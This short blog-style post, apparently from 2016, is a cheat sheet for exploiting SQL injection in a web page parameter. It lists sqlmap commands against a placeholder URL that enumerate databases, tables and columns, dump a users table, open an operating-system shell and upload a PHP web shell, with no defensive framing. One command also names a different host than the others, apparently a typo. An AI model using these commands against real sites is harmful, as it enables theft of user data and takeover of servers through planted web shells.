1. Burpsuite -> Intruder
http://www.site.com/section.php?id=51 2. sqlmap python sqlmap.py -u "http://www.site.com/section.php?id=51" # Discover databases python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs # Find tables in a particular database python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D database_name # Get columns of the table python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D database_name -T users # Get data from the columns python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D database_name -T users # Upload os-shell python sqlmap.py -u "http://www.site.com/section.php?id=51" --os-shell # Upload a PHP shell -> b374kshell.php
0 Comments
|
AuthorVitali Kremez Archives
July 2016
Categories |